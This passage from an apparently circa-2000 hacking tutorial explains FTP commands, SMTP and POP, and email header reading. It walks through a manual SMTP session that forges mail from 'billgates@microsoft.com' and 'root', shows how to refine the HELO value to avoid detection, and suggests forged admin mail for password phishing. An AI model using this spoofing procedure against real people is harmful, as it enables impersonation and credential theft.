This will get or download the text file with the name file.
To download multiple files one cannot use the get command. The mget or the
multiple gets command is
used instead.(the m in mget stands for multiple)
For example the following gets all text files from the host,

ftp>mget *.txt

Say you want to upload a single file then you use the put command and to 
upload
multiple files
use the mput command.
Say you are working in the Windows Directory and want to change to the
c:\windows\temp directory while
you are in the process of uploading files, so change the local directory use 
the
lcd command.
For example,

ftp>lcd temp

This will make temp the current local working directory.
The Bye or Close commands are basically terminating commands.The ! commad 
allows
you to escape to
the shell at any moment.
Another interesting command is the SYST command which gives us information 
on
the server's OS and FTP
server's version etc.This is excellent to get info on the host's OS cersion 
and
FTP daemon's version, so that
you can seacrh for it on the net.
For a single line description of each command use the help or the ? command
followed by the command you
want info on.
Now that you know some of the Basic FTP commands let me take you through the
process of uploading
your site to your ISP's server. I am assuming that your ISP's hostname is
isp.net and all the files that have to
uploaded to the ISP's server are in the directory c:\Site
First lets start my connecting or FTP'ing to your ISP. There are 2 ways to 
start
a FTP session.First way is to
pass an argument alognwith the Ftp Command i.e. you can directly connect to 
a
host by typing ftp followed
by the hostname. The second method involves firstly the launching of the FTP
client and then using the
Open command to connect to the host. Fot more info on the open command type 
help
open
For Example,

C:\windows>ftp isp.net
Or
C:\windows>ftp
ftp>open isp.net

In most cases after you have connected to the host i.e your ISP you will see 
the
Welcome Banner or your
ISP and then it will ask for a username and a password. Enter them. If you 
do
not have them then try the
Anonymous or the Guest Login or read on to learn to Hack into a FTP
server.Anyway getting back to the
uploading of the website. Now remember that the files you want to upload are 
in
the c:\site directory but the
current local working directory is Windows( It is normally the Default 
Directory
in which MS DOS would
open,) So before starting to upload files you need to change the Local 
working
directory from c:\windows to
c:\site. So to this use the lcd command.

For Example,

ftp>lcd c:\site

Now you are set to upload the files, I am assuming that all files in the
directory need to be uploaded, if that is
not the case then use the WildCard " * " symbol and make the necessary
selections.

ftp>mput *.*

Voila you have just uploaded your own website by using a command line FTP
program you have finally
learnt to do without the GUI clients.
You may say that all this stuff is stupid and you do not give a damn about
uploading your site and want to
learn how to break into FTP servers and steal passwords....well if you are
reading this manual then I am
sure you have no knowledge about how to hide your identity while connecting 
to a
FTP server.You see
whenevr you connect to a FTP server, any server for that matter, your IP is
recorded in the Server log and
when the system administartor finds that someone is downloading the 
passwords
file, then I am pretty much
sure that he would not be too pleased and you will find that the feds are
fighting with the SS outside your
house as to who gets to arrest you. It is illegal to download password file
which is not available to the normal
public.Now don't get the wrong idea that I am against hacking or something, 
but
what I want you guys to
understand is that I do not want you guys to get caught, and like I said 
before,
if U reading this manual then
you do not know how to edit the server logs and how to hide your identity, 
how
to erase all your tracks from
the victim's server and how to create a backdoor to the server so that you 
can
access it whenever you want.

Common FTP Hacks

There are various FTP servers with various versions. No FTP server is fully
clean of bugs. There are so
many bugs that even if I write a line of each it would become too 
loooooooong.
But you can seacrh for FTP
bugs by finding out the FTP version number and the OS running at the host 
and
searching for the hole at the
following sites:

http://astalavista.box.sk
http://cert.org
http://www.securityforce.com
http://packetstorm.genocide.com
http://www.antionline.com
http://www.rootshell.com
http://www.insecure.org
http://www.ntbugtraq.com
http://support.microsoft.com (Get Security Bulletins and Fixes to common 
holes
on Windows systems)
http://www.crosswinds.net/~hackingtruths

Some common FTP Bugs would be the FTP bounce Attack and Local FTP bugs(Read 
the
following
manual: http://www.crosswinds.net/~hackingtruths/ftpindex.txt).There is also 
a
DOS (Denial of Services, not
MSDOS) attack which can be used to crash Win NT servers and also a OOB(Out 
of
Band Attack). (Read all
about it at: http://blacksun.box.sk/ftp.txt )

SMTP [Port 25] & POP [Port 110]

Most of you would be using email clients like MS Outlook, Netscape 
Messenger,
Eudora or even Opera to
send and receive mail. Have you ever wondered what exactly your favourite 
email
client does? I will just give
you an overview of what actually happens.

Now when you compose and mail and click on Send, then your email client 
locates
the mail server that you
specified during Configuration time or suring Setup. Once the mail server is
located, your email client by
default connects to port 25(SMTP or the Simple Mail Transfer Protocol) to 
send
mail. Now at Port 25 a
daemon is running which listens for connections.Now your email client 
connects
to this daemon and sends
mail. Most mail servers have Sendmail which is also known as the buggiest 
daemon
on earth installed on
the SMTP port.Qmail is also another popular SMTP daemon running on most Web
based email services'
mail servers (eg. Hotmail is running qmail)

Now in the other case i.e when you receive mail, your email client by 
default
connects to port 110 i.e the
POP3 or the Post Office Protocol (version 3) port.Once connected the POP3 
daemon
authenticates you i.e.
asks for a user name and password which is automatically sent by your email
client to the server.Once
authenticated, you can receive mail.
This means that to send mail you need no user name and password but to 
receive
mail you need a
username and password. Recently Yahoo, once it started providing POP based 
mail,
had developed this
problem that the user could not send mail unless he had received mail i.e he 
had
authenticated.

Now in the case of free Web Based services too the same thing happens. In 
this
case you compose your
email in a form whose action tag points to a CGI (or Common Gateway 
InterFace)
script which sends the
content of the form (that would be what you composed or typed out.) to the
Sendmail deamon which uis
running on Port 25 of the mail server of the company whose mail services you 
are
using.Here you are
authenticated once you enter your user name and password at the login
page.Sendmail daemons of web
based mail servers too can be used to send mail without authentication.

************************
UberHacker Note: Above I have assumed that you have some knowledge of Web
development i.e. HTML or
HyperText MarkUp Language and CGI.
To Learn HTML goto:
www.htmlgoodies.com
Search the MSDN Library, which I think simply the most amazing and the most
comprehensive library
containing all types of Tech Text. URL: http://msdn.microsoft.com
Learn CGI programming with Perl 5 by reading my Perl Tutorials.
*************************

What is my mail server or which is the server I connect to send email.
Now if you use the email service provided by your ISP then it is pretty 
simple
to find out the mail server you
connect to, to send and receive mail. Now say your ISP's name is xyz and 
their
domain is xyz.com
Then your mail server would most probably be
mail.xyz.com (Port 25) to send mail and mail.xyz.com (Port 110) to receive
mail.Instead of mail.xyz.com
(Port 25) for sendmail mail, you can also try mailgw.xyz.com (Port 25).

Email Headers

The Sendmail daemon is a really interesting one which allows you to get root 
on
a badly configured system and also allows you to send fake mail!!!
Well to understand the concept of Fake Mail you need to be more through with
Email Headers, So let me start by explaining what email Headers actually 
are.
This brings me back to the subject of what exactly happens when you send a 
mail,
now let me resume from what happens after the Sendmail Daemon has sent your
mail. Now say you live in Los Angeles and have sent an email to a friend in 
New
York, so how does your email reach New York? Now once the Sendmail Daemon 
has
composed your mail then it will send the mail to the Server whose Domain 
name is
the same as the domain name that you entered, (In an email the Domain Name 
is
the text after the @ sign.) So your email may be first sent to the server of 
the
company that provides Internet Backbone is your Country and from there it 
would
be sent to the server is which your friend has an account, so your email 
travels
through a number of Routers and Servers before reaching your friend's Inbox.
Now whatever Server an email has travelled through is recorded in the 
Headers of
the Email, the entire path taken by the email and other valuable info is
provided by Email Headers.

So How do I see Headers?

Now to look at the complete Headers in Outlook Express , right click on the
message and Select Properties, this will bring up a Window Showing only 
Partial
Headers, Now to see the Full Headers click on the Message Source Button. In
Netscape you can look at Headers by clicking on View>Headers>Full.To learn 
about
how to see full headers in your fav email client browse the Help of your 
client.
So you did the above and now know that Headers contain some IP addresses and
some Host Names. Now I will explain what exactly Headers Tell you.
Now let's take an example header that I specially prepared for you guys.

Return-Path: name@xyz.net
Received: from mail2.xyz.net by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-
0620AM)
	id SAA0000012322; Fri, 7 Apr 2000 18:51:27 +0530 (IST)
From: "[Noname]" <name@xyz.net>
To: "Ankit Fadia" <ankit@bol.net.in>
Subject: More questions :)
Date:Mon, 28 Feb 2000 22:13:12 +0100
Message-ID: <20000407131945.16316.qmail@mail2.xyz.net>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MSMail-Priority:Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)


Now let's go through the entire headers line by line.
Return-Path: name@xyz.net
The above line tells us that the sender is name@xyz.net This line can easily 
be
forged, but let's stick to a the headers of a genuine email which has not 
been
forged.This line also tells us the name of the ISP or the name of the 
company
with which the sender has an email account with.In this case xyz become the 
name
of the ISP or Email Service provider and www.xyz.net would normaly be the
website of the email provider.

Moving further down we find the following line:

Received: from xyz.net by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM)
	id SAA0000012322; Fri, 7 Apr 2000 18:51:27 +0530 (IST)

The above line tells us that the email travelled from the server xyz.net to 
the
server delhi1.mtnl.net.in .  The text in the brackets after 
delhi1.mtnl.net.in
gives us the Sendmail version number running at delhi1.mtnl.net.in.The above
header tells us that delhi1.mtnl.net.in is running version 8.9.1 version of
Sendmail at port 25.Now within the brackets there is a date(In this case
26Oct99-0620AM)this date is not the date at which the email passed through 
this
server but the date represents when the Sendmail daemon was last configured 
or
setup or upgraded.The next line in the same header gives us the date at 
which
the email passed through the server.

By reading this header we already know that the mail originated at 
mail2.xyz.net
and was sent by name@xyz.net to ankit@bol.net.in. The mail server of
name@xyz.net  (i.e. mail2.xyz.net) then passed on the email to my mail 
server
which is delhi1.mtnl.net.in.My mail server then delivered the email to my
account.
Before the get on the easier to understand less important lines, I would 
like to
discuss the Message ID line:

Message-ID: 20000407131945.16316.qmail@mail2.xyz.net

Now if you look at this line carefully then you would find that it gives out
some very valuable info on the server at which the email was written and 
also
some info on as to when the sender or his email client logged on to his mail
server and sent this mail.Now to further understand the above line, let's 
break
it up into smaller pieces.
The part 20000407131945 represents the date/time at which the sender logged 
on
to the mail server to send the mail.It shows the date/time in the 
yyyymmddhhmmss
format.So the above piece of gibberish can be rewritten as:

2000/04/07/13:19:45 which is Year:2000,Month:April(4th month),Day:7th, and 
Time
is 1:19 and 45 seconds(PM)

The number after the first dot i.e. 16316 is the reference number of that
particular email.You know that each this email was sent from mail2.xyz.net, 
but
many more maybe thousands more have been sent by that mail server on that
particular day, so in order to distiguish mails from each other, each mail 
is
reffered to by a unique Message ID.For each mail that a mail server sends, 
it
logs details regarding info on sender, time etc etc.Now to distiguish 
between
logs of two different emails, the unique Message ID is used.So one gather 
more
info on the sender of a particular email by contacting the system 
administrator
of the mail server that the sender used to send the email with the Message 
ID.
The next bit tells us that the mail server mail2.xyz.net is running qmail 
which
like Sendmail is a daemon which handles sending of emails.

The remaining few lines are also quite self Explanatory:

From: "[Noname]" <noname@isp.net>
To: "Ankit Fadia" <ankit@bol.net.in>
Subject: More questions :)
Date:Mon, 28 Feb 2000 22:13:12 +0100
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

This tells us that the NickName of the person who has sent this mail is 
[Noname]
and his mail address would be noname@isp.net. The next line specifies the 
email
address to which the mail was sent to. The rest of the lines give us MIME 
and
other info on Encoding etc.

X-MSMail-Priority:Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300

The X-Mailer Header tell's us the Email client which sent the mail, in this 
case
it is Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0).

You may say that Headers are very boring and what the hell do they have to 
do
with Hacking.Well Hacking is about knowledge and knowledge can never be bad 
for
you and the ability to read headers is quite useful when one has to trace
Spammers or find out the person who mail bombed him.Most newbies spend a lot 
of
time Scanning for Internet hosts with Port 25 open and never bother to learn 
how
to read headers.They do not know that Headers provide you with a list of 
mail
servers which may allow you to send perfectly forged mail.So take my advice 
and
try to be as through with headers as you can, you are not a hacker if you 
are
not able to read Email headers.

Sending Forged Mail using SMTP (Port 25)

Ever dreamt of sending forged emails so that the victim does not know who 
sent
this email??? Or do you want to send an email to someone so that he thinks 
that
the Sender of the email is not you but someone else??? Well then Email 
Forging
is the thing for you.
Sending a forged email is quite simple and easy to understand, but you just 
need
to apply a liitle bit of your brain to understand the various aspects of a
perfect forged email and various applications of forging emails. Now first 
see
how one can send a forged email.

Remember that earlier in this guide I had explained how an email is sent? If 
you
do not remember then I would suggest you go back a bit and refresh your 
memory
by reading the section titled "SMTP [Port 25] & POP [Port 110]"

Now let's log on to Port 25 of a mail server and see how the Sendmail daemon
behaves and how we can send a forged mail.
Open your fav Telnet client, my favourite is the one that ships with Windows
anyway then telnet to Port 25 of the mail server.You will be welcomed by
something that is called a daemon banner.

220 delhi1.mtnl.net.in ESMTP Sendmail 8.9.1 (1.1.20.3/26Oct99-0620AM) Fri, 7 
Apr
2000 19:57:05 +0530 (IST)

**************
Hacking Truth: A daemon banner is nothing but a welcome message that the 
host
provides to the visitors.But a daemon banner is not merely a unimportant 
welcome
message.It provides us with some very valuable info on the host we have
connected to like for example when I connect to Port 23 of my ISP, then
I get a Welcome message alongwith the Joke of the day and also the most
important of all the OS and OS version runninf at my ISP.This is very 
imporant
when we are looking for an exploit which we can use to break in or get root.
*************

The daemon banner tells us the host we are connected to is running Sendmail
version 8.9.1 and uses the ESMTP standards or the Extended Simple Mail 
Tranfer
Protocol to transport messages.The number within the brackets give the date 
and
time the Sendmail daemon was last configured or upgraded.The date outside 
the
brackets is the current date and time at the host.I am sure you must have 
got
the hang of reading Headers and such info by now....that makes you kewler 
than
your friends!!!
And if you get an error message instead of the Daemon banner then it means 
that
the host you are trying to connect to has disabled public access to that 
mail
server to increase the security of the Network.

Before I go on let's see what your email client does when it has connected 
to
Port 25 and started communicating with the Sendmail daemon.Now the email 
client
sends so Sendmail commands that it knows beforehand and orders Sendmail to
prepare a mail for such and such person which is supposed to be from such 
and
such person and the body of the email is to be blah blah blah.

The morale of the story was that the email client uses Sendmail commands to 
give
info such as Sender's email address, recepient's email address, the body of 
the
email address etc etc to the Sendmail daemon, this means that the email 
client
controls what info is to be given to Sendmail and wheather this info is to 
be
true or not.The above process of connecting to Port 25 of the mail server is 
not
viewable to the user and occurs in the background.

*************
Hacking Truth: Outlook Express infact records all the commands that it 
issued to
the mail server to send mails.Ths log fils is stored in the
"c:\windows\application data" folder under the name smtp.log Just search for
smtp.log and you will get many results.Let's look at a typical Outlook 
Express
Log file.The following is an excerpt:

Outlook Express 5.00.2314.1300
SMTP Log started at 10/08/1999 15:00:33
SMTP: 15:01:15 [rx] 220 delhi1.mtnl.net.in ESMTP Sendmail 8.9.1
(1.1.20.3/16Sep99-0827PM) Fri, 8 Oct 1999 14:50:17 +0530 (IST)
SMTP: 15:01:15 [tx] HELO hacker
SMTP: 15:01:15 [rx] 250 delhi1.mtnl.net.in Hello [203.xx.248.175], pleased 
to
meet you
SMTP: 15:01:16 [tx] MAIL FROM: <ankit@bol.net.in>
SMTP: 15:01:16 [rx] 250 <ankit@bol.net.in>... Sender ok
SMTP: 15:01:16 [tx] RCPT TO: <billgates@hotmail.com>
SMTP: 15:01:16 [rx] 250 <billgates@hotmail.com>... Recipient ok
SMTP: 15:01:16 [tx] DATA
SMTP: 15:01:16 [rx] 354 Enter mail, end with "." on a line by itself
SMTP: 15:01:20 [tx]
.
SMTP: 15:01:23 [rx] 250 OAA0000014842 Message accepted for delivery
SMTP: 15:01:23 [tx] QUIT
SMTP: 15:01:23 [rx] 221 delhi1.mtnl.net.in closing connection

Those of you who are already familiar with SMTP or Sendmail commands can 
pretty
much make out how revealing this log file is and what kind of important info 
on
the email sending activities of the user is reveals.
Such a detailed report or log on each and every mail ever sent through 
Outlook
Express is recorded in this file.Deleting emails from the Sent folder of 
Outlook
Express does not clean these logs.A well informed hacker would be no time be
able to get a list of people to whom you have sent mails to.
Well that is Microsoft for you!!! Well atleast the log file does not reveal 
the
actualy body of the email.
And if you can't make head or tail or the above, then read on.
*******************

Now that we have connected to Sendmail we are going to repeat the entire 
above
process manually to send forged mail.
You do not need to memorise or remember these SMTP commands in order to send
forged mail.Whenever you have the slighest doubt or have forgotten the 
syntax or
the command itself, then you can easily get help by simply typing 'Help' at 
the
sendmail prompt.On some systems typing '?' might bring a response.

NOTE: Whatever you type at the Sendmail prompt is not visible to you unless 
you
enable the local echo option.If you using the Telnet client shipping with
Windows then simple click on Terminal > Preferences and from the dialog box
enable the Local Echo option.
So typing Help at the prompt prompts the following result:

214-This is Sendmail version 8.9.1
214-Topics:
214-    HELO    EHLO    MAIL    RCPT    DATA
214-    RSET    NOOP    QUIT    HELP    VRFY
214-    EXPN    VERB    ETRN    DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214-    sendmail-bugs@sendmail.org.
214-For local information send email to Postmaster at your site.
214 End of HELP info

To get help on individual commands you can try typing help followed by the
commandname.
For eaxmple typing
help helo

Brings the following response:

214-HELO 214- Introduce yourself.
214 End of HELP info

Eagle Eyed readers must have noticed that all messages from the server have 
a
preceeding number, well you guessed it the numbers represent the kind of 
message
following it.For example, all help messages by default have the number 
214.Each
kind of message that the server sends has a unique number associated with 
it.
Before you go on I suggest you find out what each command does by typing 
help
following by the command name and also if possible read the Unix man pages 
on
Sendmail, they are quite good.You will not be able to understand the next 
part
if you do not know the syntax and use of each command.Do read the Sendmail 
help
before reading further.

Anyway let's move on,
Now let's see...I want to send myself an email at ankit@bol.net.in from
billgates@microsoft.com
So I type the following, note that the text that I type has no preceeding 
number
and the text which have a preceeding number is the response from the server 
I am
connected to.

helo ankit.com
250 delhi1.mtnl.net.in Hello, pleased to meet you
mail from:billgates@microsoft.com
250 <billgates@microsoft.com> ... Sender Okay
rcpt to:ankit@bol.net.in
250 <ankit@bol.net.in> ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
My first forged mail!!!
.
250 Mail accepted

Then I opened my Inbox and read through the Headers of the this email that I
just forged.

Return-Path: <billgates@microsoft.com>
Received: from ankit.com by myisp.com(8.9.1/1.1.20.3/26Oct99-0620AM)
	id UAA0000026614; Fri, 7 Apr 2000 20:01:52 +0530 (IST)
Date: Fri, 7 Apr 2000 20:01:52 +0530 (IST)
From: <billgates@microsoft.com>
Message-Id: <200004071431.UAA0000026614@delhi1.mtnl.net.in>
X-UIDL: dcbef1ba736c55ddc08d6a93609979a9


The email seems to be pretty much a perfect forge, but the line that is the 
most
obvious culprit which gives me away is:

Received: from ankit.com by myisp.com (8.9.1/1.1.20.3/26Oct99-0620AM)
	id UAA0000026614; Fri, 7 Apr 2000 20:01:52 +0530 (IST)

The ankit.com thing would arouse the suspicion of any experienced hacker.Now 
how
can the following scenario be true when the email address that the message 
is
coming from has the domain name:microsoft.com but the email header says that 
the
mail originated not from a mail server within Microsoft' s network but from
ankit.com which is supposedly a mail server.

Now why did Sendmail put ankit.com in the header? So I went through the SMTP
commands that I had issued once again and found that I had given the helo
ankit.com command and Sendmail had picked this domain ankit.com and put it 
into
the header of the email.So to remove this ankit.com from the header and to 
make
the email to look more authentic, I change the parameter that I passed the 
Helo
command with.
Instead of  'helo ankit.com'  I try out 'helo microsoft.com' and let the 
other
commands remain the same.Now when I see the headers, I see that the headers 
have
changed to:

Return-Path: <billgates@microsoft.com>
Received: from microsoft.com by myisp.com (8.9.1/1.1.20.3/26Oct99-0620AM)
	id UAA0000020667; Fri, 7 Apr 2000 20:00:10 +0530 (IST)
Date: Fri, 7 Apr 2000 20:00:10 +0530 (IST)
From: <billgates@microsoft.com>
Message-Id: <200004071430.UAA0000020667@delhi1.mtnl.net.in>
X-UIDL: 636646d210be0e13fbcf936308c99222

The ankit.com bit does not appear again and this kind of forgery may pass if 
the
person to whom you are sending this email to is a newbie.But experienced 
hackers
will definitely point out that the Message-Id part of the header says that 
the
email was composed at delhi1.mtnl.net.in but the second line says that the 
email
originated at microsoft.com. So he would write to 
postmaster@delhi1.mtnl.net.in
or  help@delhi1.mtnl.net.in or root@delhi1.mtnl.net.in and complain that he 
had
received a forged email and would like to investigate.Most system 
administrators
are really jumpy about their servers being used for purposes they were not 
meant
for and will easily co operate with the comaplainer and you are caught.Some
ISP's are so cranky that if you are caught doing something like this, you 
will
probably be kicked out of the use of their service.

There is not solution to this problem.By that what I mean to say is that the
victim can always send an email to the system administrator of the server 
shown
by the Message ID line.But the forgery may look for more real if the Message 
ID
line shows the mail server of the same domain name as the forged email 
address
belongs to.For example, say the forged email address is 
billgates@microsoft.com
then instead of the Message-Id showing the delhi1.mtnl.net.in server, if it
shows something like mail.microsoft.com, it makes the email look more 
authentic.

*******************
Hacking Truth: When we give the MAIL FROM: billgates@microsoft.com, then the
mail appears to have come from Bill Gates. Now in the Mail from command, we 
can
instead of providing an email address, provide something like root or
localhost.So For Example, if I enter the command: MAIL FROM: root then the 
heads
of the email would look like:

Return-Path: <root>
Received: from microsoft.com by delhi1.mtnl.net.in
         (8.9.1/1.1.20.3/26Oct99-0620AM) id TAA0000022089; Sun, 9 Apr
         2000 19:55:42 +0530 (IST)
Date:Sun, 9 Apr 2000 19:55:42 +0530 (IST)
From: root@microsoft.com
Message-ID:200004091425.TAA0000022089@mailgw.xx.microsoft.com
X-UIDL: 636646d210be0e13fbcf936308c99222

This way we can make the email seem to have come from the system 
administrator
which then in turn can be utilised in fooling people into giving away their
Internet Passwords.Yes...Email forging CAN be used to steal passwords, one 
just
needs a bit of intelligence and a great deal of luck.

*******************
Now that you know how to read some basic headers, let's examine some more 
advanced headers which we receive from all emails sent to a mailing list.
When you see the full headers of an email that you received through a 
mailing list, you will find that the email headers are more advanced and 
difficult to understand.Let's take an example of to make things clearer.The 
following are the headers of a recent email that I received through my 
mailing list; programmingforhackers.[I myself had sent this email to the 
list.]

Return-Path:   <sentto-1575622-4-ankit=bol.net.in@returns.onelist.com>
Received:  from b05.egroups.com by delhi1.mtnl.net.in
                  (8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000021910; Thu, 13 
Apr 2000 14:29:14 +0530 (IST)
X-eGroups-Return: sentto-1575622-4-ankit=bol.net.in@returns.onelist.com
Received:from [10.1.10.37] by b05.egroups.com with NNFMP; 13 Apr 2000 
08:58:09 -0000
Received: (qmail 20883 invoked from network); 13 Apr 2000 08:58:07 -0000
Received:  from unknown (10.1.10.26) by m3.onelist.org with QMQP; 13 Apr 
2000 08:58:07 -0000
Received:  from unknown (HELO qg.egroups.com) (10.1.2.27) by mta1 with  
SMTP; 13 Apr 2000 08:58:07 -0000 Received:  (qmail 2092 invoked from 
network); 13 Apr 2000 08:58:01 -0000
Received:  from delhi1.mtnl.net.in (203.xx.243.51) by qg.egroups.com with  
SMTP; 13 Apr 2000 08:58:01 -0000
Received:  from bol.net.in by delhi1.mtnl.net.in 
(8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13
                   Apr 2000 14:28:46 +0530 (IST)
Message-ID: <38F61F28.B2045192@bol.net.in>
X-Mailer:  Mozilla 4.5 [en] (Win98; I)
X-Accept-Language: en
To: "programmingforhackers@eGroups.com" <programmingforhackers@eGroups.com>
References: <38F4E37B.55A83239@bol.net.in>
MIME-Version: 1.0
Mailing-List:  list programmingforhackers@egroups.com; contact
                   programmingforhackers-owner@egroups.com
Delivered-To: mailing list programmingforhackers@egroups.com
Precedence: bulk
List-Unsubscribe:<mailto:programmingforhackers-unsubscribe@egroups.com>
Date: Thu, 13 Apr 2000 15:25:33 -0400
X-eGroups-From: Ankit Fadia <ankit@bol.net.in>
From:  Ankit Fadia <ankit@bol.net.in>
Reply-To:  programmingforhackers-owner@egroups.com
Subject: [programmingforhackers] Hi
Content-Type: multipart/alternative;
                   boundary="------------EF668DA53EE7F0ED0AA654E9"

This email header is lot different from the headers that we had examined 
earlier.It's not as difficult to understand this header, as it seems.Believe 
me, it is quite easy, once you ge the hang of it. To examine this header, we 
will be going in the reverse order.i.e. we will take the bottommost line 
first and then slowly move up.

Date: Thu, 13 Apr 2000 15:25:33 -0400
X-eGroups-From: Ankit Fadia <ankit@bol.net.in>
From:  Ankit Fadia <ankit@bol.net.in>
Reply-To:  programmingforhackers-owner@egroups.com
Subject: [programmingforhackers] Hi
Content-Type: multipart/alternative;
                   boundary="------------EF668DA53EE7F0ED0AA654E9"

This part of the header basically tells us that the mail was sent by 
ankit@bol.net.in on 13th april at 3:15 PM 4 hours behind GMT.It also tells 
us that replying to this email will send the message to the Group Owner of 
this mailing list.(Same as the moderator of the list.)

X-Mailer:  Mozilla 4.5 [en] (Win98)
X-Accept-Language: en
To: "programmingforhackers@eGroups.com" <programmingforhackers@eGroups.com>
References: <38F4E37B.55A83239@bol.net.in>
MIME-Version: 1.0
Mailing-List:  list programmingforhackers@egroups.com; contact
                   programmingforhackers-owner@egroups.com
Delivered-To: mailing list programmingforhackers@egroups.com
Precedence: bulk
List-Unsubscribe:<mailto:programmingforhackers-unsubscribe@egroups.com>

How many times, have you seen lamers posting messages like: How can I 
unsubscribe from this list??? Or even Please Unsubscribe me, to Hardcore 
Hacking Lists .These so called Hackers are nothing but script kiddies who 
are so lame that it doesn't even stike them that seeing the email headers 
might help.Wonder if they even know what Headers are.

Most Mailing Lists(Atleast Egroups and Onelist do) attach information to the 
headers about the mailing list.This information includes the list name, the 
email address of the moderator and also the email address which is required 
to unsubscribe from the mailing list.

This part of the email header also tells us that the sender i.e. 
ankit@bol.net.in used Mozilla 4.5 running on Win98 and the mail was sent to
programmingforhackers@egroups.com

Now comes the part which a newbie might have difficult to understand.

Received:from [10.1.10.37] by b05.egroups.com with NNFMP; 13 Apr 2000 
08:58:09 -0000
Received: (qmail 20883 invoked from network); 13 Apr 2000 08:58:07 -0000
Received:  from unknown (10.1.10.26) by m3.onelist.org with QMQP; 13 Apr 
2000 08:58:07 -0000
Received:  from unknown (HELO qg.egroups.com) (10.1.2.27) by mta1 with  
SMTP; 13 Apr 2000 08:58:07 -0000 Received:  (qmail 2092 invoked from 
network); 13 Apr 2000 08:58:01 -0000
Received:  from delhi1.mtnl.net.in (203.xx.243.51) by qg.egroups.com with  
SMTP; 13 Apr 2000 08:58:01 -0000
Received:  from bol.net.in by delhi1.mtnl.net.in 
(8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13
                   Apr 2000 14:28:46 +0530 (IST)
Message-ID: 38F61F28.B2045192@bol.net.in

NOTE: Like I said earlier, we would be reading the lines in the reverse 
order.

Received:  from bol.net.in by delhi1.mtnl.net.in 
(8.9.1/1.1.20.3/26Oct99-0620AM); Thu, 13 Apr 2000 14:28:46 +0530 (IST)
Message-ID: 38F61F28.B2045192@delhi1.mtnl.net.in

This line tells us that the mail was sent using the Sendmail Daemon (8.9.1) 
running at delhi1.mtnl.net.in.The bol.net.in part was generated because the 
email client which was used by the sender to send the mail gave the 
following command to delhi1.mtnl.net.in:

helo bol.net.in

Hence it got into the header.Once the email was composed, the Sendmail 
daemon checks to which domain the email has to be sent.It found that the 
receipient was programmingforhackers@egroups.com hence it said." Let me pass 
it on to an egroups server.

Received:  from unknown (10.1.10.26) by m3.onelist.org with QMQP; 13 Apr 
2000 08:58:07 -0000
Received:  from unknown (HELO qg.egroups.com) (10.1.2.27) by mta1 with  
SMTP; 13 Apr 2000 08:58:07 -0000 Received:  (qmail 2092 invoked from 
network); 13 Apr 2000 08:58:01 -0000
Received:  from delhi1.mtnl.net.in (203.xx.243.51) by qg.egroups.com with  
SMTP; 13 Apr 2000 08:58:01 -0000

After the mail was composed, delhi1.mtnl.net.in whose IP is 203.xx.243.51 
passed the email on to the egroups server, qg.egroups.com.At egroups the 
entire world has been divided into many parts and a unique different server 
handles mails coming from different parts of the world.

Then qg.egroups.com launched the qmail daemon(qmail too is a daemon similar 
to Sendmail but it is much more secure.) running on another machine within 
the Egroups Internal Network whose IP is 10.1.2.27(See, the email headers do 
not display the machine name always, sometimes it simply displays the IP of 
the machine.And hey this machine would probably be behind a firewall, so no 
use Telnetting it.)Hence at 10.1.2.27 the email was re-composed and was sent 
to mta1 yet another machine within the Network running SMTP.But. mta1 cannot 
be it's full name, and neither has it's IP been displayed, so what is the 
address of this machine.If you look at the next line,you will see that the 
IP of mta1 is given to be: 10.1.10.26.If you have read this manual carefully 
then you would be able to say what kind of Network it is.If you can't, well, 
it is a Class B network.

mta1 or 10.1.10.26 then sent it to m3.onelist.org which is running QMQP. Now 
what the hell is that? It basically is a part of qmail which  receives  
messages via the Quick Mail Queueing Protocol (QMQP).It allows users to 
relay messages to any destination,but is generally used to send messages of 
preauthorised users.

Received:from [10.1.10.37] by b05.egroups.com with NNFMP; 13 Apr 2000 
08:58:09 -0000
Received: (qmail 20883 invoked from network); 13 Apr 2000 08:58:07 -0000

Then the QMQP was used to start the qmail daemon and the message was in 
queue and was then sent to bo5.egroups.com by 10.1.10.37 which is actually 
either m3.onelist.org or the machine at which the qmail daemon is running.
b05.egroups.com is the server where the database of the list of members of a 
particular mailing list is stored.It is here where the server sends the 
email to all members of the list.This server is runnign NNFMP which 
basically checks that the members of the list are reachable or not.For 
example, if a particular email address which is a part of a list does not 
exist then it is this NNFMP service which generates an error messages and 
therby after attempting twice or thrice to send the message,removes this 
invalid email address from the database of subscribers.

Return-Path:   <sentto-1575622-4-ankit=bol.net.in@returns.onelist.com>
Received:  from b05.egroups.com by delhi1.mtnl.net.in
                  (8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000021910; Thu, 13 
Apr 2000 14:29:14 +0530 (IST)
X-eGroups-Return: sentto-1575622-4-ankit=bol.net.in@returns.onelist.com

As an when the server finds subscribers in it's database, it prepares the 
headers and sends  the messages to them.The numbers preceeding the email 
address of the receiver is the reference number used by the Egroups server 
to refer to a particular member and the message sent to him.Hence the Return 
Path Statement does not show the sender of the email but the email address 
of the person for whom the email was meant.

There is a misconception amongst people that if an email has been sent from 
a
hotmail account, then you remain annonymous.This is not at all true.Yes 
Homtail
may seem to be anonymous to a certain extend, but it is not too difficult to
find out more about a Hotmail user.

The flaw lies in the headers that the Hotmail mail servers attach to all
outgoing mails.Hotmail records the IP's of all people who log into their
accounts.Now this IP is attached to all the respective outgoing mails.Now 
let's
take a look at a typical header of an email sent from a Hotmail account.

Return-Path: <namita_8@hotmail.com>
Received: from hotmail.com by delhi1.mtnl.net.in 
(8.9.1/1.1.20.3/26Oct99-0620AM)
	id TAA0000032714; Sun, 23 Jan 2000 19:02:21 +0530 (IST)
